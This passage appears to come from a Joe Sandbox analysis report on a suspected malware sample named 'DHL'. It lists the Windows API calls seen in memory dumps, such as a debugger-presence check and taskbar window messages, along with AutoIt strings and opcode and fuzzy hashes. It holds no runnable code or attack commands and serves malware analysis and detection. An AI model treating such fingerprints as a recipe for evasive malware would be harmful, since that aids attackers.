                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: Message
                                                        • String ID: AutoIt$Error allocating memory.
                                                        • API String ID: 2030045667-4017498283
                                                        • Opcode ID: b674fdd944d51b807d5ba6011c82cac75472b655dcd0ebffd1dcca84ccfe343a
                                                        • Instruction ID: ca6018dca44c7d9b0c66cc33204cc6eb96fe4fa9173becec46aa03419f6ef067
                                                        • Opcode Fuzzy Hash: b674fdd944d51b807d5ba6011c82cac75472b655dcd0ebffd1dcca84ccfe343a
                                                        • Instruction Fuzzy Hash: B9E04F322843183AD21437947D03FD97A849F46B75F10082AFB98A55C38BE2659047E9
                                                        APIs
                                                          • Part of subcall function 009BF7C9: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,009C0D71,?,?,?,009A100A), ref: 009BF7CE
                                                        • IsDebuggerPresent.KERNEL32(?,?,?,009A100A), ref: 009C0D75
                                                        • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,009A100A), ref: 009C0D84
                                                        Strings
                                                        • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 009C0D7F
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
                                                        • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                        • API String ID: 55579361-631824599
                                                        • Opcode ID: 2ec4fab30c5d4620144d1f03baf28260596d0cfa594b5156b70cfb41561c4f4e
                                                        • Instruction ID: e9bbd0ed223d0a1179d81af69c3fe3ef68ba3dd53a1e86945bbb0af9973b3663
                                                        • Opcode Fuzzy Hash: 2ec4fab30c5d4620144d1f03baf28260596d0cfa594b5156b70cfb41561c4f4e
                                                        • Instruction Fuzzy Hash: C6E06D706003118FD370EFF8DC047867BE4AB40750F00896DF886C6691DBB4E4458B92
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: LocalTime
                                                        • String ID: %.3d$X64
                                                        • API String ID: 481472006-1077770165
                                                        • Opcode ID: e36dc4c2fa4639e6f7a70d9c67f7d29f19be65b41891148cb7224b9d24c42bc9
                                                        • Instruction ID: 340813d3d0166bd37de97b7ccf5c570c63359a97349dc7f21b3eaef1ea09154d
                                                        • Opcode Fuzzy Hash: e36dc4c2fa4639e6f7a70d9c67f7d29f19be65b41891148cb7224b9d24c42bc9
                                                        • Instruction Fuzzy Hash: 4CD0126180A11CE9CB50A7D0DD459FAB37DBB08311F608C52FA26A1040E62CC508A7A1
                                                        APIs
                                                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00A3232C
                                                        • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00A3233F
                                                          • Part of subcall function 00A0E97B: Sleep.KERNEL32 ref: 00A0E9F3
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: FindMessagePostSleepWindow
                                                        • String ID: Shell_TrayWnd
                                                        • API String ID: 529655941-2988720461
                                                        • Opcode ID: 11e4557b11c2983031cab1bf71e83d360e38034c281586564cb9cb9de8e47bb8
                                                        • Instruction ID: 0e997119ec73d4ebec36204526116f52660ce8f70d145ab24cbe05e981b68965
                                                        • Opcode Fuzzy Hash: 11e4557b11c2983031cab1bf71e83d360e38034c281586564cb9cb9de8e47bb8
                                                        • Instruction Fuzzy Hash: 89D0C936394310B6E664E7B0AC4FFC6BA14AB00B20F0049167645BA1D0C9A4A8028B54
                                                        APIs
                                                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00A3236C
                                                        • PostMessageW.USER32(00000000), ref: 00A32373
                                                          • Part of subcall function 00A0E97B: Sleep.KERNEL32 ref: 00A0E9F3
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: FindMessagePostSleepWindow
                                                        • String ID: Shell_TrayWnd
                                                        • API String ID: 529655941-2988720461
                                                        • Opcode ID: 9fa8fcf414bf5eb5484c787c5470c7a3d92d48ad7edd78b6c36c70c1a03b74b9
                                                        • Instruction ID: d6f18b10ecb7b30ad136d8f697856d017cd23c7bc3c012382ec232865a90d378
                                                        • Opcode Fuzzy Hash: 9fa8fcf414bf5eb5484c787c5470c7a3d92d48ad7edd78b6c36c70c1a03b74b9
                                                        • Instruction Fuzzy Hash: 41D0C9323C13107AE664E7B0AC4FFC6B614AB05B20F0049167645BA1D0C9A4A8028B54
                                                        APIs
                                                        • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,?,?,00000000,?,?,?,?,?,00000000,?), ref: 009DBE93
                                                        • GetLastError.KERNEL32 ref: 009DBEA1
                                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 009DBEFC
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: ByteCharMultiWide$ErrorLast
                                                        • String ID:
                                                        • API String ID: 1717984340-0
                                                        • Opcode ID: 1df8e8706a7ecbe33b58e2a4defab32b3108e98706164fb31edcce81db893550
                                                        • Instruction ID: 949e952cee943c3f258aaf9ee341b295629c1645d0cfc1f3b47ca24d470bb8e9
                                                        • Opcode Fuzzy Hash: 1df8e8706a7ecbe33b58e2a4defab32b3108e98706164fb31edcce81db893550
                                                        • Instruction Fuzzy Hash: CF414C34640206EFCF219FA9CC54BBA7BA9DF41320F16C15AF959973A1DB308D01DB60